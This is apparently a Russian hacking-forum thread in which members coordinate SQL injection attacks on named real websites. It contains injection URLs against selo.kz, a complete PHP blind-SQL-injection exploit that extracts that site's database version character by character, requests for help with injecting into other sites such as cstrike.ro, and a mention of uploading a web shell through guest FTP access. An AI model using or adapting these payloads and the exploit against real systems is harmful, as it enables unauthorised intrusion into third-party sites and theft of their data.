http://www.selo.kz/fspisok.php?id=-24+union+select+1-- Тока не ломай кайф плз если первее до админки доберешься, не показывай результат, просто покажи видимые поля, дальше я сам ))
Gemini12 я не искал но в указанном месте нет вывода ..так что крути как слепую..версия там 5.0.85-log http://www.selo.kz/fspisok.php?id=24+AND+SUBSTRING((version()),1,1)=5--
сплоит, он конечно кривоват, но работать должен: PHP: <?php #$chars="abcdef0123456789"; // для хеша #$chars="_.\\][)(:;!@#$%^&*-+='\"<>?/,}~{ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmopqrstuvwxyz0123456789"; // для соли $chars=".54367890012-ntlog"; // бд $i=1; $to=10; $c=0; $cc=0; $data=""; $ebana=""; set_time_limit(0); while($i<=$to) { while($c<=strlen($chars)) { echo $i.":".$chars[$c]; $sock=fsockopen("www.selo.kz", 80, $errno, $errstr, 5); if(!$sock) die("hehe fuckin connect"); $ept="id=99999924+or+if(substring((select+version()),".$i.",1)=".$chars[$c].",(select+1+union+select+2),null)"; $h="POST /fspisok.php? HTTP/1.0\r\n"; $h.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*\r\n"; $h.="Content-Type: application/x-www-form-urlencoded\r\n"; $h.="User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; DigExt)\r\n"; $h.="Host: www.selo.kz\r\n"; $h.="Content-Length: ".strlen($ept)."\r\n"; $h.="Cookie: bbsessionhash=636f59afa8e2b1a8519bbbf5669a48b6; bblastvisit=1242490434; bblastactivity=0\r\n\r\n"; $h.=$ept; fwrite($sock, $h); sleep(1); $c++; $data=""; while(!feof($sock)) { $data=fgets($sock, 1024); if(eregi("Subquery returns more than 1 row", $data)) { $cc=1; break; } } if($cc==1) { echo ":OKE!!1\r\n"; $ebana.=$chars[$c-1]; break; } else echo ":FUCK!1\r\n"; fclose($sock); } $c=0; $cc=0; $i++; } echo $ebana; ?>
Aртем я думаю что для таких дел как раскрутка слепой скули есть много програм например сипт..кототрый поверь мне не настолько кривоват как твой скрипт..если конечно это твой скрипт
Хм... я часто сталкиваюсь с ситуациями, когда например нет возможности использовать, чужие например программы. Исходя из чего и приходится всё делать самому, что относительно положительно влияет на умственный потенциал. А что касается программ, то для человека, который ИЗУЧАЕТ, например Blind SQL Inj, то ему просто напросто НЕОБХОДИМО всё делать в ручную. Потому, что не одна программа НЕИДЕАЛЬНА, в связи с чем могут возникать разные трудности в реализации инъекции, у человека, который бездумно использовал эти самые программы.
ну в ручную раскручивать слепую скулю я думаю будет необдуманно, когда есть сотни программ заточенный под это дело..насчет идеальных программ Вы правы...но в данной ситуации ваш скрипт намного уступает по функционалу тому же сипту...
Соотношение время-качество играет весомую роль. Зачастую нет времени делать качественно. Но здесь важно не качество, а результат, чего-бы это не стоило.
Aртем если писать,то писать то что может конкурировать со скриптами выложенными в этой теме,а не лишь бы писать, где на перебор 1-го символа (не хеша где a-f0-9) - уходит 8 запросов (я взял пример Грея),в нем находится середина диапазона chr(0)-chr(255),и проверяется на истинность в зависимости от ответа - циклично ,ну это так,к слову.детальней это все описал Qwazar опять же thread119047.html
L I G A и Pashkela, я не в коем случае не пытался написать универсальный скрипт для посимвольного перебора и уж тем более набиваться в конкуренты. Я просто написал сплоит для посимвольного перебора, непосредственно основывая работу исходя из поста #9868
Возник такой вопрос Есть сайт Code: http://www.cstrike.ro/cs_1.6_servers.php?start=190 Ошибку выдёт только в таком случаи Code: http://www.cstrike.ro/cs_1.6_servers.php?start=-190 А так не хочет Code: http://www.cstrike.ro/cs_1.6_servers.php?start=190' т.е. там как я понял, такая фильтрация PHP: $start = (int)$_GET['start']; Реально ли раскрутить такую SQl inj , если это вообще SQL inj
Byrger как слепую инъекцию http://forum.antichat.ru/thread43966-blind.html Вопросик-на сайте открыт фтп по логину guest,залил в папку uploads шелл,но когда через http хочу его открыть,говорят мол нету такой папки,при фтп соединении видно всего пару папок,сам сайт невиден.
ты сам ответил на свой вопрос) всеравно как слепую, попробуй BSQL Hacker облегчит тебе раскрутку ... не руками ж крутить
ага тогда вот такой вопрос есть ошибка в site.ru/news.php?page=-1 выводит PHP: warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/webhost/www/site/includes/common.inc(1685) : eval()'d code on line 13. при вставке ковычкеу никакой ошибки не выдаёт и при 2-1 выдаёт первую страницу. При and 1=2 тоже ошибку не выдаёт. Как можно попробовать такое раскрутить?
